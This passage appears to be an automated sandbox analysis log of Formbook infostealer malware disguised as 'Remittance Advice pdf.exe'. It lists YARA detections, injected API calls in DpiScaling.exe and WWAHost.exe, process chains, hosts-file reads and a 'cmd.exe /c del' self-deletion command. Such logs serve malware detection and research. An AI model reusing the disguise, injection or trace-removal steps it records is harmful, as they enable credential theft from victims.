          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049795D0 NtClose,LdrInitializeThunk,13_2_049795D0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979540 NtReadFile,LdrInitializeThunk,13_2_04979540
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_049796E0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04979660
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979780 NtMapViewOfSection,LdrInitializeThunk,13_2_04979780
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049797A0 NtUnmapViewOfSection,LdrInitializeThunk,13_2_049797A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979FE0 NtCreateMutant,LdrInitializeThunk,13_2_04979FE0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979710 NtQueryInformationToken,LdrInitializeThunk,13_2_04979710
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049798F0 NtReadVirtualMemory,LdrInitializeThunk,13_2_049798F0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979840 NtDelayExecution,LdrInitializeThunk,13_2_04979840
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,13_2_04979860
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049799A0 NtCreateSection,LdrInitializeThunk,13_2_049799A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_04979910
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A00 NtProtectVirtualMemory,LdrInitializeThunk,13_2_04979A00
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A20 NtResumeThread,LdrInitializeThunk,13_2_04979A20
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A50 NtCreateFile,LdrInitializeThunk,13_2_04979A50
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049795F0 NtQueryInformationFile,13_2_049795F0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497AD30 NtSetContextThread,13_2_0497AD30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979520 NtWaitForSingleObject,13_2_04979520
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979560 NtWriteFile,13_2_04979560
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049796D0 NtCreateKey,13_2_049796D0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979610 NtEnumerateValueKey,13_2_04979610
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979650 NtQueryValueKey,13_2_04979650
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979670 NtQueryInformationProcess,13_2_04979670
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497A710 NtOpenProcessToken,13_2_0497A710
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979730 NtQueryVirtualMemory,13_2_04979730
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497A770 NtOpenThread,13_2_0497A770
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979770 NtSetInformationFile,13_2_04979770
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979760 NtOpenProcess,13_2_04979760
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049798A0 NtWriteVirtualMemory,13_2_049798A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979820 NtEnumerateKey,13_2_04979820
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497B040 NtSuspendThread,13_2_0497B040
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049799D0 NtCreateProcessEx,13_2_049799D0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979950 NtQueueApcThread,13_2_04979950
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A80 NtOpenDirectoryObject,13_2_04979A80
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A10 NtQuerySection,13_2_04979A10
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497A3B0 NtGetContextThread,13_2_0497A3B0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979B00 NtSetValueKey,13_2_04979B00
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427B90 NtCreateFile,13_2_10427B90
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427C40 NtReadFile,13_2_10427C40
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427CC0 NtClose,13_2_10427CC0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427D70 NtAllocateVirtualMemory,13_2_10427D70
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427C3A NtReadFile,13_2_10427C3A
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427CC4 NtClose,13_2_10427CC4
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427D6A NtAllocateVirtualMemory,13_2_10427D6A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A50 NtCreateFile,LdrInitializeThunk,20_2_036B9A50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_036B9910
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B99A0 NtCreateSection,LdrInitializeThunk,20_2_036B99A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9860 NtQuerySystemInformation,LdrInitializeThunk,20_2_036B9860
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9840 NtDelayExecution,LdrInitializeThunk,20_2_036B9840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9710 NtQueryInformationToken,LdrInitializeThunk,20_2_036B9710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9FE0 NtCreateMutant,LdrInitializeThunk,20_2_036B9FE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9780 NtMapViewOfSection,LdrInitializeThunk,20_2_036B9780
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9660 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_036B9660
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9650 NtQueryValueKey,LdrInitializeThunk,20_2_036B9650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B96E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_036B96E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B96D0 NtCreateKey,LdrInitializeThunk,20_2_036B96D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9540 NtReadFile,LdrInitializeThunk,20_2_036B9540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B95D0 NtClose,LdrInitializeThunk,20_2_036B95D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9B00 NtSetValueKey,20_2_036B9B00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BA3B0 NtGetContextThread,20_2_036BA3B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A20 NtResumeThread,20_2_036B9A20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A00 NtProtectVirtualMemory,20_2_036B9A00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A10 NtQuerySection,20_2_036B9A10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A80 NtOpenDirectoryObject,20_2_036B9A80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9950 NtQueueApcThread,20_2_036B9950
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B99D0 NtCreateProcessEx,20_2_036B99D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BB040 NtSuspendThread,20_2_036BB040
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9820 NtEnumerateKey,20_2_036B9820
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B98F0 NtReadVirtualMemory,20_2_036B98F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B98A0 NtWriteVirtualMemory,20_2_036B98A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9760 NtOpenProcess,20_2_036B9760
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BA770 NtOpenThread,20_2_036BA770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9770 NtSetInformationFile,20_2_036B9770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9730 NtQueryVirtualMemory,20_2_036B9730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BA710 NtOpenProcessToken,20_2_036BA710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B97A0 NtUnmapViewOfSection,20_2_036B97A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9670 NtQueryInformationProcess,20_2_036B9670
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9610 NtEnumerateValueKey,20_2_036B9610
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9560 NtWriteFile,20_2_036B9560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9520 NtWaitForSingleObject,20_2_036B9520
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BAD30 NtSetContextThread,20_2_036BAD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B95F0 NtQueryInformationFile,20_2_036B95F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717B90 NtCreateFile,20_2_02717B90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717C40 NtReadFile,20_2_02717C40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717CC0 NtClose,20_2_02717CC0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717D70 NtAllocateVirtualMemory,20_2_02717D70
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717C3A NtReadFile,20_2_02717C3A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717CC4 NtClose,20_2_02717CC4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717D6A NtAllocateVirtualMemory,20_2_02717D6A
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494841F13_2_0494841F
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FD46613_2_049FD466
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496258113_2_04962581
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494D5E013_2_0494D5E0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A025DD13_2_04A025DD
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A02D0713_2_04A02D07
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04930D2013_2_04930D20
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A01D5513_2_04A01D55
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A02EF713_2_04A02EF7
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FD61613_2_049FD616
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04956E3013_2_04956E30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A01FF113_2_04A01FF1
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0DFCE13_2_04A0DFCE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494B09013_2_0494B090
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A020A813_2_04A020A8
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A013_2_049620A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A028EC13_2_04A028EC
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0E82413_2_04A0E824
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F100213_2_049F1002
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493F90013_2_0493F900
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0495412013_2_04954120
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A022AE13_2_04A022AE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049EFA2B13_2_049EFA2B
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496EBB013_2_0496EBB0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F03DA13_2_049F03DA
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FDBD213_2_049FDBD2
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A02B2813_2_04A02B28
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1041102613_2_10411026
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1041103013_2_10411030
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042B12713_2_1042B127
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10418A3013_2_10418A30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042B52A13_2_1042B52A
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10412D9013_2_10412D90
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042C59F13_2_1042C59F
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042BF8113_2_1042BF81
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10412FB013_2_10412FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03742B2820_2_03742B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373DBD220_2_0373DBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AEBB020_2_036AEBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037422AE20_2_037422AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369412020_2_03694120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367F90020_2_0367F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373100220_2_03731002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037428EC20_2_037428EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A020_2_036A20A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037420A820_2_037420A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368B09020_2_0368B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03741FF120_2_03741FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03696E3020_2_03696E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373D61620_2_0373D616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03742EF720_2_03742EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03741D5520_2_03741D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03670D2020_2_03670D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03742D0720_2_03742D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368D5E020_2_0368D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037425DD20_2_037425DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A258120_2_036A2581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373D46620_2_0373D466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368841F20_2_0368841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02708A3020_2_02708A30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271B12720_2_0271B127
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02702FB020_2_02702FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271BF8120_2_0271BF81
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271B52A20_2_0271B52A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02702D9020_2_02702D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271C59F20_2_0271C59F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0367B150 appears 35 times
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 0493B150 appears 45 times
          Source: Remittance Advice pdf.exeBinary or memory string: OriginalFilename vs Remittance Advice pdf.exe
          Source: Remittance Advice pdf.exe, 00000000.00000003.329625690.0000000002124000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs Remittance Advice pdf.exe
          Source: Remittance Advice pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/4
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Remittance Advice pdf.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile read: C:\Users\user\Desktop\Remittance Advice pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Remittance Advice pdf.exe 'C:\Users\user\Desktop\Remittance Advice pdf.exe'
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\DpiScaling.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\DpiScaling.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: Binary string: WWAHost.pdb source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500837817.0000000004A2F000.00000040.00000001.sdmp, WWAHost.exe, 00000014.00000002.599807554.000000000376F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe, WWAHost.exe
          Source: Binary string: DpiScaling.pdb source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: DpiScaling.pdbGCTL source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E9C388 push ecx; mov dword ptr [esp], edx0_3_03E9C38A
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D320 push 0040E090h; ret 0_3_03E8D494
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E941C0 push 00414DE0h; ret 0_3_03E941E4
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E94108 push 00414D49h; ret 0_3_03E9414D
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E990D4 push ecx; mov dword ptr [esp], edx0_3_03E990D6
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D050 push 0040E090h; ret 0_3_03E8D494
